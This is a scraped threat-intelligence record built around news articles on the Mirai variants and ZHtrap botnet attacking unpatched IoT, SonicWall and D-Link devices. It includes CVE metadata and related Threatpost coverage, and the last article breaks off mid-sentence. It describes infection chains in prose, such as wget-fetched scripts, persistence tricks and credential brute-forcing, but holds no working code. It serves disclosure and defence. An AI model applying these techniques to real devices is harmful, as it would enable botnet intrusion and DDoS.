New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild

2021-03-16T10:32:00

Description

[![](https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg)](<https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg>) Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices. "Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up. The rash of vulnerabilities being exploited include: * [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) \- a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January * [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) \- a D-Link DNS-320 firewall remote code execution (RCE) vulnerability * [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) \- Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges * [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) \- an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40 * [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) \- a Netis WF2419 wireless router RCE exploit, and * [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) \- a Netgear ProSAFE Plus RCE vulnerability "The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases," SonicWall said in a statement to The Hacker News. "It is not viable against any properly patched SonicWall appliances." Also included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>). The attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13. Regardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. Besides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords. "The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researcher said. ### New ZHtrap Botnet Traps Victims Using a Honeypot In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>). [![](https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg)](<https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg>) While honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation. It achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload - * MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>) * Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>) * [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and * Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361) "ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features," the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). "Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device." [![](https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg)](<https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg>) Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads. Noting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an "interesting" evolution of botnets to facilitate finding more targets. These Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants. Last March, researchers discovered a Mirai variant called "[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>)," which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named "[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>)," which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches. Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:3907AE12F794F0523BEE196D6543A50F", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild", "description": "[![](https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg)](<https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg>)\n\nCybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.\n\n\"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,\" Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up.\n\nThe rash of vulnerabilities being exploited include:\n\n * [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) \\- a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January\n * [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) \\- a D-Link DNS-320 firewall remote code execution (RCE) vulnerability\n * [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) \\- Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges\n * [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) \\- an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40\n * [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) \\- a Netis WF2419 wireless router RCE exploit, and\n * [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) \\- a Netgear ProSAFE Plus RCE vulnerability\n\n\"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\" SonicWall said in a statement to The Hacker News. \"It is not viable against any properly patched SonicWall appliances.\"\n\nAlso included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>).\n\nThe attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.\n\nRegardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.\n\nBesides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.\n\n\"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,\" the researcher said.\n\n### New ZHtrap Botnet Traps Victims Using a Honeypot\n\nIn a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>).\n\n[![](https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg)](<https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg>)\n\nWhile honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.\n\nIt achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload -\n\n * MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>)\n * Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>)\n * [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and\n * Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361)\n\n\"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,\" the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). \"Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.\"\n\n[![](https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg)](<https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg>)\n\nOnce it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.\n\nNoting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an \"interesting\" evolution of botnets to facilitate finding more targets.\n\nThese Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants.\n\nLast March, researchers discovered a Mirai variant called \"[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>),\" which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named \"[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>),\" which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-03-16T10:32:00", "modified": "2021-03-18T03:14:02", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/03/new-mirai-variant-and-zhtrap-botnet.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2014-8361", "CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "immutableFields": [], "lastseen": "2022-05-09T12:39:02", "viewCount": 380, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0F9260AA-94E1-4977-804E-30BF58B4B639", "AKB:2C82DAAE-9BBF-44F8-B1A3-BFE303FB1B39", "AKB:370332F7-5750-47DA-AB2B-FA7031E09847", "AKB:4A6EA472-07F9-4F41-9994-6394FE5838B6", "AKB:6FA0F70D-A8F0-453C-A49C-E85D1581EB2A", "AKB:9F58CF06-BDF5-4077-ABE5-72DF3E82D56E", "AKB:F5BB1D1A-703E-4AF0-AC4F-1096F8E165AA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0815", "CPAI-2019-2247", "CPAI-2020-3260", "CPAI-2020-3300", "CPAI-2021-0158", "CPAI-2021-0914"]}, {"type": "cve", "idList": ["CVE-2014-8361", "CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"]}, {"type": "exploitdb", "idList": ["EDB-ID:48149"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177"]}, {"type": "f5", "idList": ["F5:K57390658"]}, {"type": "githubexploit", "idList": ["9BD1FC77-5827-5107-8C1F-FC0741D1A19D", "C3F856DE-1DDF-5DF2-8AD1-EE7532C07200"]}, {"type": "jvn", "idList": ["JVN:47580234", "JVN:67456944", "JVN:74871939"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "nessus", "idList": ["REALTEK_CVE_2014_8361.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132090", "PACKETSTORM:156588", "PACKETSTORM:162408"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D"]}, {"type": "securelist", "idList": ["SECURELIST:2F75371B5752C888430A598DF749FD1A", "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6"]}, {"type": "seebug", "idList": ["SSV:99154"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "THREATPOST:4C2D088C37CAF9E8959CD8833D4B2668", "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "THREATPOST:991E2229B84BA734163394FA362D4D33", "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "THREATPOST:B768158F88D25034EC975AA313B9339C", "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C"]}, {"type": "zdi", "idList": ["ZDI-15-155", "ZDI-21-153", "ZDI-21-154"]}, {"type": "zdt", "idList": ["1337DAY-ID-23686", "1337DAY-ID-36171"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:0F9260AA-94E1-4977-804E-30BF58B4B639", "AKB:2C82DAAE-9BBF-44F8-B1A3-BFE303FB1B39", "AKB:370332F7-5750-47DA-AB2B-FA7031E09847", "AKB:6FA0F70D-A8F0-453C-A49C-E85D1581EB2A", "AKB:9F58CF06-BDF5-4077-ABE5-72DF3E82D56E", "AKB:F5BB1D1A-703E-4AF0-AC4F-1096F8E165AA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-2247", "CPAI-2020-3260", "CPAI-2020-3300", "CPAI-2021-0158"]}, {"type": "cve", "idList": ["CVE-2014-8361", "CVE-2021-22502"]}, {"type": "exploitdb", "idList": ["EDB-ID:48149"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177"]}, {"type": "f5", "idList": ["F5:K57390658"]}, {"type": "githubexploit", "idList": ["9BD1FC77-5827-5107-8C1F-FC0741D1A19D", "C3F856DE-1DDF-5DF2-8AD1-EE7532C07200"]}, {"type": "jvn", "idList": ["JVN:47580234"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/DLINK_UPNP_EXEC_NOAUTH"]}, {"type": "nessus", "idList": ["REALTEK_CVE_2014_8361.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156588"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D"]}, {"type": "seebug", "idList": ["SSV:99154"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "zdi", "idList": ["ZDI-21-153", "ZDI-21-154"]}, {"type": "zdt", "idList": ["1337DAY-ID-36171"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1660023718, "score": 1660023995}, "_internal": {"score_hash": "b72a12b871e76a90c87dd1c9bbabd81b"}}

{"threatpost": [{"lastseen": "2021-03-17T20:47:24", "description": "A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices \u2014 as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.\n\nSince Feb. 16, the new variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet. It\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), years after source code for the malware [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\n\u201cThe attacks are still ongoing at the time of this writing,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team [on Monday](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>). \u201cUpon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.\u201d\n\n## **Initial Exploit: New and Old Flaws**\n\nThe attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit ([CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>)); Yealink Device Management remote code-execution (RCE) flaws ([CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>)); a Netgear ProSAFE Plus RCE flaw ([CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>)); an RCE flaw in Micro Focus Operation Bridge Reporter ([CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>)); and a Netis WF2419 wireless router exploit ([CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) ).\n\nPatches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.\n\nFor instance, \u201cthe VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\u201d a SonicWall spokesperson told Threatpost. \u201cIt is not viable against any properly patched SonicWall appliances.\u201d\n\nThe botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.\n\n\u201cWe cannot say with certainty what the targeted devices are for the unidentified exploits,\u201d Zhibin Zhang, principal researcher for Unit 42, told Threatpost. \u201cHowever, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.\u201d\n\nThe exploits themselves include two RCE attacks \u2014 including an exploit targeting a command-injection vulnerability in certain components; and an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitized). The third exploit targets the op_type parameter, which is not properly sanitized leading to a command injection, said researchers.\n\nThe latter has \u201cbeen observed in the past being [used by [the] Moobot [botnet]](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), however the exact target is unknown,\u201d researchers noted. Threatpost has reached out to researchers for further information on these unknown targets.\n\n## **Mirai Botnet: A Set of Binaries**\n\nAfter initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware\u2019s infrastructure. The shell script then downloads several Mirai binaries and executes them, one-by-one.\n\nOne such binary includes lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs and startup scripts); creates packet filter rules to bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports (to make remote access to the affected system more challenging for admins); and schedules a job that aims to rerun the lolol.sh script every hour (for persistence). Of note, this latter process is flawed, said researchers, as the cron configuration is incorrect.\n\nAnother binary (install.sh) downloads various files and packages \u2013 including GoLang v1.9.4, the \u201cnbrute\u201d binaries (that [brute-force various credentials](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>)) and the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by \u201cnbrute\u201d).\n\nThe final binary is called dark.[arch], and is based on the Mirai codebase. This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using hardcoded credentials in the binary.\n\n## **Mirai Variants Continue to Pop Up**\n\nThe variant is only the latest to rely on Mirai\u2019s source code, [which has proliferated into more than 60 variants](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) since bursting on the scene with a massive distributed denial of service (DDoS) [takedown of DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) in 2016.\n\nLast year, a Mirai variant was found [targeting Zyxel network-attached storage (NAS) devices](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) using a critical vulnerability that was only recently discovered, according to security researchers. In 2019, [a variant of the botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>) was found sniffing out and targeting vulnerabilities in enterprise wireless presentation and display systems. And, a 2018 variant [was used to launch a series of DDoS campaigns](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) against financial-sector businesses.\n\nResearchers said that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.\n\n\u201cThe IoT realm remains an easily accessible target for attackers,\u201d according to Unit 42\u2019s report. \u201cMany vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:57:46", "type": "threatpost", "title": "Latest Mirai Variant Targets SonicWall, D-Link and IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-03-16T16:57:46", "id": "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "href": "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:57", "description": "A zero day vulnerability in popular household routers from D-Link and Trendnet could be exploited by attackers to run arbitrary code on devices.\n\nThe flaw, which can be exploited without authentication, is present in version 1.3 of Realtek\u2019s SDK, which figures into some brands of routers, according to by HP\u2019s Zero Day Initiative who disclosed the vulnerability last Friday.\n\n\u201cThe specific flaw exists within the miniigd SOAP service,\u201d reads the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-155/>), \u201cThe issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a service call. An attacker could leverage this vulnerability to execute code with root privileges.\u201d\n\nRicky \u201cHeadless Zeke\u201d Lawshae, a security researcher for DV Labs at HP\u2019s Tipping Point reported the vulnerability (CVE-2014-8361) to HP\u2019s ZDI in August 2014. Lawshae initially identified the vulnerabilities in routers from Trendnet and D-link, but acknowledged on Twitter [over the weekend](<https://twitter.com/HeadlessZeke/status/592125815183147008>) that anything using the miniigd binary from Realtek\u2019s SDK could be vulnerable.\n\n> Remember that 0day I mentioned a loooong time ago? The advisory just went up.\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591714797395185664>)\n\n> Unauth remote root via the WAN port on a huge number of SOHO routers using the RealTek chipset SDK <http://t.co/tVWqJuvNl3>\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591715502860304384>)\n\nZDI reached out to the vendor four times from August to October last year without hearing back and decided to go public with the vulnerability last week.\n\nTo mitigate the vulnerability, ZDI is instructing users to restrict Realtek SDK\u2019s interaction to trusted machines. Using either firewalls or whitelisting, users should only grant \u201cclients and servers that have a legitimate procedural relationship\u201d with the SDK the ability to access it.\n\nRouter companies have had an extraordinarily tough go of it on the security front this year. D-Link in particular has been forced to [patch a handful of vulnerabilities](<https://threatpost.com/d-link-working-on-firmware-updates-for-three-critical-bugs/111420>) in its home routers that gave attackers [root access and enabled DNS hijacking](<https://threatpost.com/d-link-routers-haunted-by-remote-command-injection-bug/111355>) throughout February and March.\n", "cvss3": {}, "published": "2015-04-30T14:07:04", "type": "threatpost", "title": "Routers Vulnerable to Critical Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2015-05-06T17:15:08", "id": "THREATPOST:B768158F88D25034EC975AA313B9339C", "href": "https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-05-20T12:57:09", "description": "A recently developed botnet named \u201cSimps\u201d has emerged from the cyber-underground to carry out distributed denial-of-service (DDoS) attacks on gaming targets and others, using internet of things (IoT) nodes. It\u2019s part of the toolset used by the Keksec cybercrime group, researchers said.\n\nAccording to the Uptycs\u2019 threat research team, Simps was first seen in April being dropped on IoT devices by the Gafgyt botnet. Gafgyt (a.k.a. Bashlite) is a Linux-based botnet that was [first uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>). It targets vulnerable IoT devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale DDoS attacks and download next-stage payloads to infected machines. It [recently added new 